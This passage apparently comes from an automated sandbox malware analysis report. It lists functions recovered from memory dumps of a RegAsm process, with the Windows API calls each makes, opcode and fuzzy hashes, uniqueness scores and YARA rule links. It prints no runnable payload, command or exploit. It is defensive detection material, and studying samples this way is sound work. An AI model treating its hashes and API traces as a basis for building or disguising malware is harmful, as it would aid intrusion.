                                  • Opcode Fuzzy Hash: 7fccff05780e4d0235fdc41725f35f657c7316918af786c595ca0bd1f005a720
                                  • Instruction Fuzzy Hash: F91161716012859FDB14CF19DCC5756FBD8EF44620F08C4AAEC48CB242E675E904CB62
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 1D89A2B4, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(?,0A1AC197,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1D89A308
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: c7bf5a076db82aae94eb3a089e3b691e9db5b7ef5607a1f7947bc749250b942c
                                  • Instruction ID: 6341dcb615835425254423e48a11e5a0d534d9f0be7f987ab609c8a5d7f27e64
                                  • Opcode Fuzzy Hash: c7bf5a076db82aae94eb3a089e3b691e9db5b7ef5607a1f7947bc749250b942c
                                  • Instruction Fuzzy Hash: F601C4755093C49FC7118F15DC84B52FFB4DF46620F0980DAED898F263D275A908CB62
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1D89A8D6, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D89A926
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: db6b2513dd80209eb9f0455248215f2aca38814ee4dc6150c63aba0f26684cc9
                                  • Instruction ID: 9b3825c6f27771b0084d30a901e98d476a54ae8b1d53b22afb012c246d8393a8
                                  • Opcode Fuzzy Hash: db6b2513dd80209eb9f0455248215f2aca38814ee4dc6150c63aba0f26684cc9
                                  • Instruction Fuzzy Hash: 61016275A40204ABD350DF16DC46B26FBF8FB89B20F14815AED085B781D371F925CAE5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C381CF, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction ID: 1b425a9abebd9a4cf9964972c25f5a4cd39e17db1a67d0660db4e4710803085b
                                  • Opcode Fuzzy Hash: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction Fuzzy Hash: 01F055E0860B0A34FF243B252E26BFF01239F427E4F604228FD5285006CF2AC84F0461
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1D89A2D6, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(?,0A1AC197,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1D89A308
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: dee67d49048ab42dc18c2c5aeff634dcb49119dbb6e21df359aff02c6b9c57aa
                                  • Instruction ID: ee1264542e000dc1f1e38f200ec6b76a44454c9fe046241b71b119e74a46381e
                                  • Opcode Fuzzy Hash: dee67d49048ab42dc18c2c5aeff634dcb49119dbb6e21df359aff02c6b9c57aa
                                  • Instruction Fuzzy Hash: CEF0AF35604784DFDB10CF46D889762FBA4EF84B21F08C09ADD894B352D275A948DAA2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00C31820, Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegSetValueExA.KERNELBASE(?,00C368C2,00000000,00000001,?,?,?,?,?,?,00C31137,?,?,00000000,00000000,000000FF), ref: 00C31831
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction ID: 9428a53115b5da7353f12e8d7339dafa9696524181653009d336d13ff4d8f942
                                  • Opcode Fuzzy Hash: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction Fuzzy Hash: D6C012706407067AF61005544C2AFD36A579F117B0F900305BE75500E4975348508524
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  Function 00C37C33, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLongPathNameW.KERNEL32(?,00C304A2,00000200,00C318B8,?,?,?,?,00C36953,00C36918,?,?,00C311DE,00000000,000000FF,00000007), ref: 00C37C4D
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID:
                                  • API String ID: 82841172-0
                                  • Opcode ID: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction ID: ef09fb0b1322a84ad82ab9713ca7fd962ccacd7908c5b2b7525d7fe1cb2f05ec
                                  • Opcode Fuzzy Hash: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction Fuzzy Hash: 4DC012743043006BE710891089C4B5F625DAB90751F10C608F9A6851C1CB3088409621
                                  Uniqueness

                                  Uniqueness Score: 0.11%

                                  Function 00C34C80, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00C34C54,00C34CC4,00C30A9B,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C34C94
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                                  • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1FC517C8, Relevance: 1.0, Instructions: 1011COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f850e40ddf5bd12217da6d757f737eb11cc38cef69cd5604b7b648674018ec8
                                  • Instruction ID: 0e3a39c994b61e6adf9c7a28992dfdabb58577e4472f9b48245133a1cd20b41b
                                  • Opcode Fuzzy Hash: 3f850e40ddf5bd12217da6d757f737eb11cc38cef69cd5604b7b648674018ec8
                                  • Instruction Fuzzy Hash: 4021BD31F0011ACBCF14ABB9C5A46BEBBB2EFD4300F624865D141AF295DF349D2187A6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50150, Relevance: .2, Instructions: 195COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6fa1c53744029f150944dfb3b4652af66fdca6e27b6df5abcc62023c9a0597e
                                  • Instruction ID: 64783ce98f6518a52912aa7e5b44e9c756e37f4754f6d2472d3a72b4186693e2
                                  • Opcode Fuzzy Hash: a6fa1c53744029f150944dfb3b4652af66fdca6e27b6df5abcc62023c9a0597e
                                  • Instruction Fuzzy Hash: 28812A34A0021ACFD704DFA8D9D4A9DBBF2FF84305F11856AE006AF2A5DB31AD46DB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50D60, Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f04c84c50d1d276fceeea9ac9b82785c74c0b21f4dfa9979501fc47b5284acd
                                  • Instruction ID: baf2b625ad38b81893d5e0cc104907721336382735c2758206513cb99d4ec81a
                                  • Opcode Fuzzy Hash: 6f04c84c50d1d276fceeea9ac9b82785c74c0b21f4dfa9979501fc47b5284acd
                                  • Instruction Fuzzy Hash: C551C135784222CBDB049A38CC8074973B2FB84710F514668EA5AEF3A1EB71EC06DB59
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50120, Relevance: .1, Instructions: 144COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 639cd2afcdefb9ec90e2fed9e44dd37cd9c745e49924431010202548a6c47cb2
                                  • Instruction ID: 82b3601272c952815cd6cbdf745b9f6fce9f41325a539603a662e470ee572951
                                  • Opcode Fuzzy Hash: 639cd2afcdefb9ec90e2fed9e44dd37cd9c745e49924431010202548a6c47cb2
                                  • Instruction Fuzzy Hash: A1516D34A0425ACFD704DBB8D9D4ADDBBF1FF89304F10866AD005EB2A6DB31A846CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC515D8, Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4950ca3d1080ecf60cdebba6926bf8aed10dc1e138745df27f360c4ec5aec80
                                  • Instruction ID: e72220dae0300b693b902f49e4ab40e120834cef23ef3ff4ca9acd0b29dcb099
                                  • Opcode Fuzzy Hash: b4950ca3d1080ecf60cdebba6926bf8aed10dc1e138745df27f360c4ec5aec80
                                  • Instruction Fuzzy Hash: B841AC38B402118FDB44EBBCC85469D77F2EBD9340F604569C505AB3A2EF36AD02CB95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC51070, Relevance: .1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01d29d856467fb73a2d9bbe1082df7f6a43990752358ca3d5867a7d4ddc85803
                                  • Instruction ID: df2c042848dc297bc5b0d135ab8304cf7cd0f423d6289947a70bc0489d56a966
                                  • Opcode Fuzzy Hash: 01d29d856467fb73a2d9bbe1082df7f6a43990752358ca3d5867a7d4ddc85803
                                  • Instruction Fuzzy Hash: 51412938B002248FCB04EB68DCD569D77F2FB9835075484A6D805BB29ADB317E46CB64
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50860, Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53179f3950ef6032062f9f383dcd37ca253e66325dec8dd36fa6e0f47ce414a7
                                  • Instruction ID: 32aee4600bdf5814d9c2e3c7d39139f0e34507d74e3e1985aff00736218225da
                                  • Opcode Fuzzy Hash: 53179f3950ef6032062f9f383dcd37ca253e66325dec8dd36fa6e0f47ce414a7
                                  • Instruction Fuzzy Hash: 6D319C30B401248BCB44EB7CD8E466EB7F6ABD8340B558529C906EB399DF35AC06C7A5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC51080, Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f65d5318e24e87b56b2c1c2c86b7da6b6c4b0e90420f485fa3b542b9c4b8890
                                  • Instruction ID: 8a911209f0bacee952fe5bd49fce5f95c1aa92698e99e289e1a01bdd48469092
                                  • Opcode Fuzzy Hash: 0f65d5318e24e87b56b2c1c2c86b7da6b6c4b0e90420f485fa3b542b9c4b8890
                                  • Instruction Fuzzy Hash: EE411938B002248FCB04EB29CCD599D7BF6FB9835075484A6E805BB25ADF317D46CB64
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50661, Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0800b69c39c4cef2314c19f8c519bfda4d4f031be7cecb69c53bd3da525e8f3
                                  • Instruction ID: 08dd277c6f0651fe108003533c33272c1bba3af1dcb8fc4d5edde2e756ae87b9
                                  • Opcode Fuzzy Hash: d0800b69c39c4cef2314c19f8c519bfda4d4f031be7cecb69c53bd3da525e8f3
                                  • Instruction Fuzzy Hash: 44318D35B002149FDB04DB78C895BEEBBF2AB8C310F118479E606EB391DE729C058B95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50670, Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ec62c63189b66dd4b2532c628e49f362735e06201e627a1d57454066f45c357
                                  • Instruction ID: c0707a3d5230241052b16b621421bca4d802f63f9e64b6dc54ba500e971fe19e
                                  • Opcode Fuzzy Hash: 4ec62c63189b66dd4b2532c628e49f362735e06201e627a1d57454066f45c357
                                  • Instruction Fuzzy Hash: D3314B34B002149FDB14DB78C894BAEBBF6AB8C710F118579E606EB391DE729C058B95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC51260, Relevance: .1, Instructions: 103COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5db8f768783a5a6838385ee2ac70f007aeca5de853119d3bfa0bcbc2ae0cb9db
                                  • Instruction ID: e176a948d5650b9c2283075174a7562d38cac68b47046099ab21e860539ef9de
                                  • Opcode Fuzzy Hash: 5db8f768783a5a6838385ee2ac70f007aeca5de853119d3bfa0bcbc2ae0cb9db
                                  • Instruction Fuzzy Hash: 24418B34B042548BEB04DB7DD8987DD7BF5FB94304F118869C111AB266DF356C06CB69
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC510AF, Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d81237780977460cc0859f34f061aa61c5b8e053cc377627bb8cd9469dd9c42
                                  • Instruction ID: c8affbd5925a4af57b008efa112cdfb7e6d03ac765ad0107f6440674ccb34fdf
                                  • Opcode Fuzzy Hash: 8d81237780977460cc0859f34f061aa61c5b8e053cc377627bb8cd9469dd9c42
                                  • Instruction Fuzzy Hash: 5441F638B002248FCB04EB28DCD559D77F2FB9835035585A6E805BB26ADF317E46CBA4
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC51270, Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e87acf8766713f976a786e68545ba09fe2cd3e575fed5ca6741d8b1656c733b1
                                  • Instruction ID: 5a022c35bade5b2978645180602d92e995dd6eeab35c7f33991a8af30c31599d
                                  • Opcode Fuzzy Hash: e87acf8766713f976a786e68545ba09fe2cd3e575fed5ca6741d8b1656c733b1
                                  • Instruction Fuzzy Hash: 49318834B002188BDB00EB7DD8D879D7BF9FB94304F118869C115AB266DF356C0ACBA9
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC517B9, Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d6f91934b79d9644c66cf203718e7b95a05b43241070ce53698d42aab1a25b5
                                  • Instruction ID: 6b7588d87e2565a70ad992fd57bffefbb51321861e849f8725957c0cf9ea8e69
                                  • Opcode Fuzzy Hash: 3d6f91934b79d9644c66cf203718e7b95a05b43241070ce53698d42aab1a25b5
                                  • Instruction Fuzzy Hash: C321C131F04216CBCF15ABB8D5A46BEBBB2EF90300F624865C041BF295DF349D2187A6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC5084F, Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfb0f053c9c11693a0b653c7f2757653d845263853126670046c7a6b20bafcdb
                                  • Instruction ID: 567f95192db9075026855bf3cbbb6251fbf6feb5654c83a2f930b0025e471abb
                                  • Opcode Fuzzy Hash: cfb0f053c9c11693a0b653c7f2757653d845263853126670046c7a6b20bafcdb
                                  • Instruction Fuzzy Hash: 4121D335B441258FCB04DB7CD8D069E7BF2AB98341B458625C805DB39ADF30AC06CBA5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50D7F, Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0026a6d0d9a6f5f75aa3d4b93e6bafa7b5a389570a29f60efd753803e44cae4a
                                  • Instruction ID: bae92403bb38c65cad3146119f8f3a4df32e3eb0361fb10ebb6acd6ce82f8d5a
                                  • Opcode Fuzzy Hash: 0026a6d0d9a6f5f75aa3d4b93e6bafa7b5a389570a29f60efd753803e44cae4a
                                  • Instruction Fuzzy Hash: EF117832B04232CFDB048A38CC412C977B2EB89310F110979D505EB390DB75ED12CB84
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 20261BCC, Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb0499d14bbf97476602862eb38fd114e543fdfcdaad1a9f5a3fc1f739c73426
                                  • Instruction ID: cb9bccd3aae435177639d28b89be96a4e292da7d3d286dc113abe4a947bafa83
                                  • Opcode Fuzzy Hash: bb0499d14bbf97476602862eb38fd114e543fdfcdaad1a9f5a3fc1f739c73426
                                  • Instruction Fuzzy Hash: A011BAB5648301AFD340CF19D881A5BFBE4FB98664F14896EF998D7311D331EA148FA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1D8AAD44, Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281186224.000000001D8AA000.00000040.00000001.sdmp, Offset: 1D8AA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d8aa000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c20387da4cd4ab943c418d362905fb7d7f3398faa2fbd466b02370191188e17
                                  • Instruction ID: 844340c555ecdecad656f709b6ecc5683d94ec2573e4200b8bb8a889409151e7
                                  • Opcode Fuzzy Hash: 3c20387da4cd4ab943c418d362905fb7d7f3398faa2fbd466b02370191188e17
                                  • Instruction Fuzzy Hash: 5D11ECB5648301AFD350CF09DC81A57FBE4EB88660F14891EF99997311D271E9148FA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 20261A70, Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06e823e7f0d38e531c27dcc55e037c62ec6611f9943a78a47db441bd23e1edfc
                                  • Instruction ID: 2f15f2e4ab4cb59bea5925f38d1bca09dd27ca863acf7cf639f0aac6339eb63e
                                  • Opcode Fuzzy Hash: 06e823e7f0d38e531c27dcc55e037c62ec6611f9943a78a47db441bd23e1edfc
                                  • Instruction Fuzzy Hash: EB11FAB5608301AFD350CF09DC81A57FBE8EB88660F14892EF999D7311D371E9148FA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC514A8, Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f71e8f84a1239301087084ee66c64bd9696403221557529921c2129c4dcb45b
                                  • Instruction ID: aace729b85ac5f7b87289de89bb2d3e72b05b3bed48d0cf35b537ddaf7fd9bfb
                                  • Opcode Fuzzy Hash: 5f71e8f84a1239301087084ee66c64bd9696403221557529921c2129c4dcb45b
                                  • Instruction Fuzzy Hash: A2016D71F401098BCB54DBB9D9451DEBBF5FF99350B6402A5C11AE3241EB315E02CBA9
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50C90, Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c8f2fd7f2bd6a511ad110d40d67084b081c56e84518fe1dd61750191183d5c94
                                  • Instruction ID: ec642684891940a63c1aede20dedfe892cf2b3f3e37016eafc1a319717c116c5
                                  • Opcode Fuzzy Hash: c8f2fd7f2bd6a511ad110d40d67084b081c56e84518fe1dd61750191183d5c94
                                  • Instruction Fuzzy Hash: 3B113A797082458FCB04EB38C8D421D77F1FBC8605F918859E896CB395EB34A909DB43
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1D8605DF, Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24280923432.000000001D860000.00000040.00000040.sdmp, Offset: 1D860000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d860000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bf4dcaeba6900a265a0c3f1dcc340a04f9777e6444fdc7faf391759a3c3ba14
                                  • Instruction ID: b278d98f53e6661ccc27cbfeee51bfe01a7df53d145fbacead73bb210c4e9302
                                  • Opcode Fuzzy Hash: 7bf4dcaeba6900a265a0c3f1dcc340a04f9777e6444fdc7faf391759a3c3ba14
                                  • Instruction Fuzzy Hash: E401DBB55097805FD7118F15DC41862FFE8DF86630708C49FEC49CB652C2296909C771
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC514B8, Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b05515a8f63fdfb25d71061938399d645ead571ffbbefa476f5627f544fcce7
                                  • Instruction ID: dc946cc5cf31f31aaa8d629ab4da97bf221ee20eea2a810c46f9e696f5637053
